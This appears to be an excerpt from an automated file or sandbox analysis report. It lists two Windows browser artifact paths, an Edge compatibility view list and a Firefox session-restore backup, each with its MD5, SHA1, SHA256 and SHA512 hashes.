C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\LICIZUQP\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 890d8371cf2eaee04f8238eb0a5638a9
SHA1 588c2d4a23d9d0b6bd54f0f9b19100bfeba8d7bb
SHA256 85de9e4b55ed2c4fd693587e3936ff589c1486100a567d0b1b84502421d9eb10
SHA512 2fc10aa17765ccd6d103d90c31721230bf9269b25a6bd9e749c9e6f6123dcf7d0e3260c2ce3a459b67c1d0c1219ee6609fcabf77564d6a908f35ed9af79cc601